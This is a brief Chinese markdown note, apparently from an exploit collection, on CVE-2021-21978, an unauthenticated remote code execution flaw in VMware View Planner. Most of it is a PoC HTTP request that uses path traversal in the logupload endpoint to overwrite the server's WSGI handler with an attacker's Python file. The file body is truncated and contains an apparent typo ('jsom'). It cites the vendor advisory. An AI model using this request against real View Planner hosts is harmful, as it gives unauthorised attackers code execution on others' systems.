VMware View Planner 未授权RCE (CVE-2021-21978).md
965 B / 2021-05-21 09:14:38
# VMware View Planner 未授权RCE (CVE-2021-21978)
输入验证不正确以及缺少授权会导致在logupload Web应用程序中上传任意文件。具有对View Planner Harness的网络访问权限未经授权的攻击者可以上传并执行特制文件,从而导致在logupload容器中远程执行代码。
**PoC:**
```
POST /logupload?logMetaData={"itrLogPath":"../../../../../../etc/httpd/html/wsgi_log_upload","logFileType":"log_upload_wsgi.py","workloadID":"2"}
Accept-Encoding:gzip,deflate
Content-Type:multipart/form-data;boundary=---WebKitFormBoundaryH8GoragzRFVTw1VD
------WebKitFormBoundaryH8GoragzRFVTw1VD
Content-Disposition:form-data;name="logfile";filename=""
Content-Type:text/plain
#! /usr/bin/env python3
import cgi
import os,sys
import logging
import jsom
....
```
![](images/16158593231899.jpg)
ref:
* https://www.vmware.com/security/advisories/VMSA-2021-0003.html
* https://twitter.com/osama_hroot/status/1367258907601698816